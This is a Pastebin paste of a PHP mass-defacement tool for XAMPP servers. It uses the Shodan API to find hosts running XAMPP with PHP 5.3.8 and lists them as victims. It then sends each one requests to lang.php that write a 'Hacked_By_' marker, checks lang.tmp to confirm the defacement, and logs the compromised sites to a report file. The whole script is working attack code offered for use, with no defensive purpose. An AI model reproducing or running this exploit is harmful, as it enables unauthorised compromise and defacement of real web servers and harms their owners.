Advertisement
shor7cut

-_-

Jul 21st, 2015
707
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <!DOCTYPE html>
  2. <html>
  3. <head>
  4. <title></title>
  5. <link rel="stylesheet" type="text/css" href="https://bootswatch.com/cyborg/bootstrap.css"/>
  6. <link rel="stylesheet" type="text/css" href="https://bootswatch.com/cyborg/bootstrap.min.css"/>
  7. </head>
  8. <body>
  9. <div class="container">
  10.  
  11. <?php
  12. /*
  13. Name : Xampp Deface & Auto Submit (Search Shodan)
  14. Author : Shor7cut
  15. Hai , Kiddies ?
  16. */
  17. error_reporting(0);
  18. set_time_limit(0);
  19. ini_set('memory_limit', '64M');
  20. if($_GET['scan']==""){?>
  21. <div class="row">
  22. <ul class="breadcrumb">
  23. <li><a href="?cmd=scan">Scan</a></li>
  24. <li><a href="?cmd=victim">Cari victim</a></li>
  25. </ul>
  26. </div>
  27.  
  28. <?php
  29. }
  30. if($_GET['cmd']=="scan"){?>
  31. <form class="form-horizontal" action="<?php echo basename($_SERVER["SCRIPT_FILENAME"]);?>" method="post">
  32. <div class="form-group">
  33. <label class="col-lg-2 control-label">Notice </label>
  34. <div class="col-lg-5">
  35. <input type="text" class="form-control" name="hacker" value="Shor7cut" placeholder="Shor7cut">
  36. </div>
  37. </div>
  38.  
  39.  
  40. <div class="form-group">
  41. <label for="textArea" class="col-lg-2 control-label">Textarea</label>
  42. <div class="col-lg-10">
  43. <textarea class="form-control" rows="3" name="sites" id="textArea"></textarea>
  44. <span class="help-block">A longer block of help text that breaks onto a new line and may extend beyond one line.</span>
  45. </div>
  46. </div>
  47.  
  48. <div class="form-group">
  49. <label class="col-lg-2 control-label">Pemisah</label>
  50. <div class="col-lg-1">
  51. <input type="text" class="form-control" name="pemisah" value="|" placeholder="|">
  52. </div>
  53. <input type="submit" class="btn btn-primary" name="scan" value="scan">
  54. </div>
  55.  
  56.  
  57.  
  58. </form>
  59.  
  60. <?php
  61. }
  62. if($_GET['cmd']=="victim"){
  63. $get = file_get_contents("https://api.shodan.io/shodan/host/search?key=1111111111111111111111111111&query=xampp+PHP/5.3.8");
  64. $json = json_decode($get,true);
  65. echo count($json['matches'])."<br>";
  66. echo '<textarea class="form-control" rows="3" name="sites" id="textArea">';
  67. foreach ($json['matches'] as $key => $value) {
  68. echo $value['ip_str']."|";
  69. }
  70. echo '</textarea>';
  71. }
  72.  
  73.  
  74. if($_POST['scan']){
  75. $sit = $_POST['sites'];
  76. $pemisah = $_POST['pemisah'];
  77. $hacker = $_POST['hacker'];
  78. $site = explode($pemisah, $sit);
  79. ?>
  80. <div class="panel panel-primary">
  81. <div class="panel-heading">
  82. <h3 class="panel-title">Scan Target</h3>
  83. </div>
  84. <div class="panel-body">
  85.  
  86. <?php
  87. foreach ($site as $key => $sites) {
  88. $url1 = "$sites/xampp/lang.php?Hacked_By_$hacker";
  89. $url2 = "$sites/security/lang.php?Hacked_By_$hacker";
  90. $patch_result1 = "$sites/xampp/lang.tmp?";
  91. $patch_result2 = "$sites/security/lang.tmp?";
  92.  
  93. // xampp - patch lang.php\\
  94. $xamppcurl = curl_init("$url1");
  95. curl_setopt($xamppcurl, CURLOPT_FAILONERROR, true);
  96. curl_setopt($xamppcurl, CURLOPT_FOLLOWLOCATION, true);
  97. curl_setopt($xamppcurl, CURLOPT_RETURNTRANSFER, true);
  98. curl_setopt($xamppcurl, CURLOPT_CONNECTTIMEOUT ,0);
  99. curl_setopt($xamppcurl, CURLOPT_TIMEOUT, 30);
  100. $result = curl_exec($xamppcurl);
  101.  
  102. $xamppcur2 = curl_init("$url2");
  103. curl_setopt($xamppcur2, CURLOPT_FAILONERROR, true);
  104. curl_setopt($xamppcur2, CURLOPT_FOLLOWLOCATION, true);
  105. curl_setopt($xamppcur2, CURLOPT_RETURNTRANSFER, true);
  106. curl_setopt($xamppcur2, CURLOPT_CONNECTTIMEOUT ,0);
  107. curl_setopt($xamppcur2, CURLOPT_TIMEOUT, 30);
  108. $result = curl_exec($xamppcur2);
  109.  
  110.  
  111.  
  112. // xampp - patch \\
  113. $xampp_tmp = curl_init("$patch_result1");
  114. curl_setopt($xampp_tmp, CURLOPT_FAILONERROR, true);
  115. curl_setopt($xampp_tmp, CURLOPT_FOLLOWLOCATION, true);
  116. curl_setopt($xampp_tmp, CURLOPT_RETURNTRANSFER, true);
  117. curl_setopt($xampp_tmp, CURLOPT_CONNECTTIMEOUT ,0);
  118. curl_setopt($xampp_tmp, CURLOPT_TIMEOUT, 30);
  119. $resultxampp_tmp = curl_exec($xampp_tmp);
  120.  
  121. $xampp_tmp2 = curl_init("$patch_result2");
  122. curl_setopt($xampp_tmp2, CURLOPT_FAILONERROR, true);
  123. curl_setopt($xampp_tmp2, CURLOPT_FOLLOWLOCATION, true);
  124. curl_setopt($xampp_tmp2, CURLOPT_RETURNTRANSFER, true);
  125. curl_setopt($xampp_tmp2, CURLOPT_CONNECTTIMEOUT ,0);
  126. curl_setopt($xampp_tmp2, CURLOPT_TIMEOUT, 30);
  127. $resultxampp_tmp2 = curl_exec($xampp_tmp2);
  128.  
  129.  
  130. ?>
  131.  
  132. <?php
  133. if(eregi("Hacked_By_",$resultxampp_tmp))
  134. {
  135. echo $patch_result1."<br>";
  136. $berkas =fopen("laporan.txt","a");
  137. fputs($berkas, $patch_result1."\r\n");
  138. fclose($berkas);
  139. }else if(eregi("Hacked_By_",$resultxampp_tmp2))
  140. {
  141. echo $patch_result2."<br>";
  142. $berkas =fopen("laporan.txt","a");
  143. fputs($berkas, $patch_result2."\r\n");
  144. fclose($berkas);
  145.  
  146. }else {
  147. echo $sites." -> not vuln"."<br>";
  148. }
  149.  
  150. flush();
  151. ob_flush();
  152. sleep(2);
  153. }
  154. }
  155. ?>
  156.  
  157. </div>
  158. </div>
  159. </div>
  160. </body>
  161. </html>
Advertisement
RAW Paste Data Copied
Advertisement